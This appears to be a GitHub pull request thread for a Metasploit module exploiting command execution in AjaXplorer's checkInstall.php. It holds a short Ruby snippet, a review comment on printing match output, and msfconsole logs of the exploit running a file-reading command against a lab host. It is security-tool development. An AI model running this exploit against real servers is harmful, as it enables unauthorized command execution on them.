Add OSVDB-63552 AjaXplorer module (2010) #900
Testing!
print_error("#{peer} - This server may not be vulnerable") | ||
else | ||
print_status("#{peer} - Command output from the server:") | ||
print_line(m[1]) |
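Review bot: `print_line(m[1])` on the last line of this hunk only prints the command output if `m` is a MatchData with a first capture group. If `m` is a String, `m[1]` on Ruby 1.9 returns just its second character, so the printed result depends on how `m` was produced further up. Assign the captured text to a named variable at the point where the match is made and print that variable here, so this line does not depend on the type of `m`.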
Using ruby 1.9 I get the output if I modify it to:
print_line(m)
msf exploit(ajaxplorer_checkinstall_exec) > show options

Module options (exploit/multi/http/ajaxplorer_checkinstall_exec):

   Name       Current Setting     Required  Description
   ----       ---------------     --------  -----------
   Proxies                        no        Use a proxy chain
   RHOST      192.168.1.130       yes       The target address
   RPORT      80                  yes       The target port
   TARGETURI  /AjaXplorer-2.5.5/  yes       The base path to AjaXplorer
   VHOST                          no        HTTP server virtual host

Payload options (cmd/unix/generic):

   Name  Current Setting                          Required  Description
   ----  ---------------                          --------  -----------
   CMD   cat /var/www/AjaXplorer-2.5.5/index.php  yes       The command string to execute

Exploit target:

   Id  Name
   --  ----
   0   AjaXplorer 2.5.5 or older

msf exploit(ajaxplorer_checkinstall_exec) > rexploit
[*] Reloading module...
[*] 192.168.1.130:80 - The server returned: 200 OK
[*] 192.168.1.130:80 - Command output from the server:
Working with:
[] Started reverse double handler id
msf exploit(ajaxplorer_checkinstall_exec) > show options

Module options (exploit/multi/http/ajaxplorer_checkinstall_exec):

   Name       Current Setting     Required  Description
   ----       ---------------     --------  -----------
   Proxies                        no        Use a proxy chain
   RHOST      192.168.1.130       yes       The target address
   RPORT      80                  yes       The target port
   TARGETURI  /AjaXplorer-2.5.5/  yes       The base path to AjaXplorer
   VHOST                          no        HTTP server virtual host

Payload options (cmd/unix/generic):

   Name  Current Setting                          Required  Description
   ----  ---------------                          --------  -----------
   CMD   cat /var/www/AjaXplorer-2.5.5/index.php  yes       The command string to execute

Exploit target:

   Id  Name
   --  ----
   0   AjaXplorer 2.5.5 or older

msf exploit(ajaxplorer_checkinstall_exec) > rexploit
[*] Reloading module...
[*] 192.168.1.130:80 - The server returned: 200 OK
[*] 192.168.1.130:80 - Command output from the server:
?
[*] Exploit completed, but no session was created.

After modifying L:101 according to my comment, the output is printed in my case. Awaiting sinn3r's check and response before merging.
Because the original script used match()
Corrected.
This pull request was created on behalf of David Maciejak, who emailed it to our dev mailbox. Old bug.
This module exploits an arbitrary command execution vulnerability in the AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to 2.6 are vulnerable.